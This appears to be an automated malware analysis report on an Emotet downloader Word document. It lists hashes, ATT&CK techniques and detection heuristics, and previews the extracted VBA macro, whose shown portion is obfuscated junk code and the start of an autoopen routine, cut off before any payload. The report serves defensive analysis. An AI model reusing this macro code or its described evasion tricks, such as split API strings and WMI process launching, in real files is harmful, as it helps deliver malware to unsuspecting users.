Emotet Office (OLE) malware analysis — malicious · 7dc4511c61552365

MALICIOUS

Office (OLE)

172.0 KB Created: 2019-05-03 08:24:00 Authoring application: Microsoft Office Word First seen: 2019-05-31

MD5: e437e2ad4c082f81a73c91773f03abf0 SHA-1: 8cd67862952de04b7862afbb901e0e6be657dacc SHA-256: 7dc4511c61552365a3c6e63b70fea2c85e8aade4bda6d843f7f788bb7ddf2b2e

342 Risk Score

Malware Insights

Emotet · confidence 95%

MITRE ATT&CK

T1059.005 Visual Basic T1204.002 Malicious File T1059 Command and Scripting Interpreter T1105 Ingress Tool Transfer

The sample is a malicious Office document containing a VBA macro. The macro utilizes obfuscated API calls, specifically reassembling the string 'winmgmts' to launch a WMI process. This indicates an intent to download and execute a second-stage payload, consistent with Emotet downloader behavior. ClamAV detection further supports this classification.

Heuristics 9

ClamAV: Doc.Downloader.Emotet-6961571-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Downloader.Emotet-6961571-0
VBA macros detected medium 5 related findings OLE_VBA_MACROS

Document contains VBA macro code
VBA WMI Win32_Process launcher critical OLE_VBA_WMI_PROCESS_CREATE

VBA macro builds or references a WMI moniker for Win32_Process and invokes .Create to start a command. This is a high-confidence macro execution chain that often hides the WMI class name through string concatenation or helper functions.
Dangerous API name reassembled from split string literals critical OLE_VBA_SPLIT_KEYWORD_OBFUSCATION

VBA concatenates short string literals that reassemble a dangerous API/ProgID/LOLBin name (e.g. Scripting.FileSystemObject, WScript.Shell, powershell, URLDownloadToFile) which appears in no single literal. Splitting an API name across string concatenation is done only to evade keyword scanning.
AutoOpen macro high OLE_VBA_AUTOOPEN

AutoOpen macro
GetObject call high OLE_VBA_GETOBJ

GetObject call
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 48469 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	48469 bytes
SHA-256: `878dd92b7e59473d21017fb0fb428492c2493b535925db5cfffc35f41baaaab0`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "u186448_" Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = False Attribute VB_Customizable = True Attribute VB_Name = "A48033" Attribute VB_Base = "0{9AB66006-30BF-4D23-9C1B-E33866D7A8EA}{F17C468E-30BE-4FA2-9900-1D00A51B6D3F}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = False Attribute VB_TemplateDerived = False Attribute VB_Customizable = False Attribute VB_Name = "Q75_588" Attribute VB_Name = "z68272" Attribute VB_Name = "I6009126" Attribute VB_Base = "0{B8AE5069-FB83-451A-B248-488A96D6DBD1}{35CE6481-853F-4A12-A1F6-1371FD2E7675}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = False Attribute VB_TemplateDerived = False Attribute VB_Customizable = False Attribute VB_Name = "j355575" Function P_403621(R65_2181) Select Case Y5__8541 Case w_52084 = X14616 WeekdayName F027995 + c333_382 + (K427768 / 311893928 + (v_6_92 - Hex(q33_6_2 - v69748 * Q_46226 + Cos(B794591 + 215685281 - 352000946)))) Case M93573 = D7736562 WeekdayName k1952064 + m95_784 + (s0058606 / 369746922 + (w7238179 - Hex(v34314 - h92_511 * D_45211 + Cos(k24626 + 971679756 - 523163877)))) End Select Select Case t9_44660 Case A44317 = m7508457 WeekdayName z3418_ + w45309 + (p36619 / 247588718 + (T6_17087 - Hex(n8_75908 - a884563 * A3_854 + Cos(G459750 + 823330785 - 579843263)))) Case F932223 = i8186458 WeekdayName d40485 + u3969871 + (D0727895 / 219524125 + (O_3164 - Hex(X69544 - J05169 * u658364 + Cos(f7365455 + 824673226 - 82169901)))) End Select Select Case j825568 Case i7_1150 = u117449 WeekdayName A_18__ + J_10_9 + (s96366 / 816472186 + (N7714976 - Hex(j7_81193 - n_307664 * Y299845 + Cos(J5572660 + 133300817 - 436270560)))) Case Q_624496 = O99370 WeekdayName k8748454 + E7506_ + (K74_78 / 985351992 + (d9__78 - Hex(c1_33913 - P054015 * h81_593 + Cos(K46032_ + 873663906 - 176770177)))) End Select Set P_403621 = CVar(R65_2181) Select Case i2_20_91 Case w5895151 = P97476 WeekdayName t073667 + X106204 + (c629628 / 563635249 + (i7657433 - Hex(z3215__7 - z352_0 * S57000 + Cos(v843_723 + 551116620 - 308711073)))) Case T62106 = M568_2 WeekdayName E1543514 + K422776 + (r3714159 / 473267411 + (P094260 - Hex(w6085463 - s2851661 * o87292 + Cos(p_18659 + 358284753 - 413071179)))) End Select Select Case A340368 Case P391908 = v37729 WeekdayName T02174 + i2895702 + (f_538_ / 681486187 + (V1526322 - Hex(T8_741 - R0455212 * I3353708 + Cos(J6461_ + 24822658 - 398568105)))) Case E2__465 = O1576_7 WeekdayName Z5870809 + T6286471 + (C8302_ / 955901499 + (q66_1_48 - Hex(P27_78 - U040_4 * r206_810 + Cos(u71938 + 73124123 - 726124901)))) End Select Select Case G606939 Case G8_19073 = h8135933 WeekdayName D350_0 + Z3763_74 + (G_84683 / 739786347 + (U96__4 - Hex(O2106089 - X17258 * T9987302 + Cos(j77_3813 + 452577503 - 243430467)))) Case i8424173 = u1012769 WeekdayName d_19660 + H30772 + (b_96150 / 715500031 + (I65982 - Hex(f77792 - L61640 * z03_67 + Cos(z68585 + 625801103 - 667691583)))) End Select End Function Sub autoopen() Select Case k32051 Case E_35792 = d126_3_ WeekdayName w610703 + X3956066 + (z5457682 / 807355329 + (z2792_63 - Hex(M428782 - B63343 * U4_958 + Cos(C3750_3 + 761155360 - 416969660)))) Case J81967 = P9_4760 WeekdayName S7083276 + U13596 + (V56520_ / 626917154 + (v1_104 - Hex(u51754_6 - E429616 * v6_8756 + Cos(I530117 + 693031406 - 446444453)))) End Select Select Case I846209 Case X3767131 = E37374_4 WeekdayName i1684039 + Y89__851 + (R987_27 / 477895206 + (J73135 - Hex(L8069635 - O__04_5 * t82491 + Cos(u5986_6 + 855987001 - 245916624)))) Case z3569_39 = O48520 WeekdayName V168_4 + z915113 + (G5254730 / 291952869 + (D35139 - Hex(T33262_ - p33126_5 * D63078_ + Cos(U1233737 + 864864300 - 323233399)))) End Select ... (truncated)

SHA-256: 878dd92b7e59473d21017fb0fb428492c2493b535925db5cfffc35f41baaaab0

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "u186448_"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "A48033"
Attribute VB_Base = "0{9AB66006-30BF-4D23-9C1B-E33866D7A8EA}{F17C468E-30BE-4FA2-9900-1D00A51B6D3F}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "Q75_588"

Attribute VB_Name = "z68272"

Attribute VB_Name = "I6009126"
Attribute VB_Base = "0{B8AE5069-FB83-451A-B248-488A96D6DBD1}{35CE6481-853F-4A12-A1F6-1371FD2E7675}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "j355575"
Function P_403621(R65_2181)
   Select Case Y5__8541
Case w_52084 = X14616
WeekdayName F027995 + c333_382 + (K427768 / 311893928 + (v_6_92 - Hex(q33_6_2 - v69748 * Q_46226 + Cos(B794591 + 215685281 - 352000946))))
Case M93573 = D7736562
WeekdayName k1952064 + m95_784 + (s0058606 / 369746922 + (w7238179 - Hex(v34314 - h92_511 * D_45211 + Cos(k24626 + 971679756 - 523163877))))
End Select
   Select Case t9_44660
Case A44317 = m7508457
WeekdayName z3418_ + w45309 + (p36619 / 247588718 + (T6_17087 - Hex(n8_75908 - a884563 * A3_854 + Cos(G459750 + 823330785 - 579843263))))
Case F932223 = i8186458
WeekdayName d40485 + u3969871 + (D0727895 / 219524125 + (O_3164 - Hex(X69544 - J05169 * u658364 + Cos(f7365455 + 824673226 - 82169901))))
End Select
   Select Case j825568
Case i7_1150 = u117449
WeekdayName A_18__ + J_10_9 + (s96366 / 816472186 + (N7714976 - Hex(j7_81193 - n_307664 * Y299845 + Cos(J5572660 + 133300817 - 436270560))))
Case Q_624496 = O99370
WeekdayName k8748454 + E7506_ + (K74_78 / 985351992 + (d9__78 - Hex(c1_33913 - P054015 * h81_593 + Cos(K46032_ + 873663906 - 176770177))))
End Select
Set P_403621 = CVar(R65_2181)
   Select Case i2_20_91
Case w5895151 = P97476
WeekdayName t073667 + X106204 + (c629628 / 563635249 + (i7657433 - Hex(z3215__7 - z352_0 * S57000 + Cos(v843_723 + 551116620 - 308711073))))
Case T62106 = M568_2
WeekdayName E1543514 + K422776 + (r3714159 / 473267411 + (P094260 - Hex(w6085463 - s2851661 * o87292 + Cos(p_18659 + 358284753 - 413071179))))
End Select
   Select Case A340368
Case P391908 = v37729
WeekdayName T02174 + i2895702 + (f_538_ / 681486187 + (V1526322 - Hex(T8_741 - R0455212 * I3353708 + Cos(J6461_ + 24822658 - 398568105))))
Case E2__465 = O1576_7
WeekdayName Z5870809 + T6286471 + (C8302_ / 955901499 + (q66_1_48 - Hex(P27_78 - U040_4 * r206_810 + Cos(u71938 + 73124123 - 726124901))))
End Select
   Select Case G606939
Case G8_19073 = h8135933
WeekdayName D350_0 + Z3763_74 + (G_84683 / 739786347 + (U96__4 - Hex(O2106089 - X17258 * T9987302 + Cos(j77_3813 + 452577503 - 243430467))))
Case i8424173 = u1012769
WeekdayName d_19660 + H30772 + (b_96150 / 715500031 + (I65982 - Hex(f77792 - L61640 * z03_67 + Cos(z68585 + 625801103 - 667691583))))
End Select
End Function
Sub autoopen()
   Select Case k32051
Case E_35792 = d126_3_
WeekdayName w610703 + X3956066 + (z5457682 / 807355329 + (z2792_63 - Hex(M428782 - B63343 * U4_958 + Cos(C3750_3 + 761155360 - 416969660))))
Case J81967 = P9_4760
WeekdayName S7083276 + U13596 + (V56520_ / 626917154 + (v1_104 - Hex(u51754_6 - E429616 * v6_8756 + Cos(I530117 + 693031406 - 446444453))))
End Select
   Select Case I846209
Case X3767131 = E37374_4
WeekdayName i1684039 + Y89__851 + (R987_27 / 477895206 + (J73135 - Hex(L8069635 - O__04_5 * t82491 + Cos(u5986_6 + 855987001 - 245916624))))
Case z3569_39 = O48520
WeekdayName V168_4 + z915113 + (G5254730 / 291952869 + (D35139 - Hex(T33262_ - p33126_5 * D63078_ + Cos(U1233737 + 864864300 - 323233399))))
End Select

... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.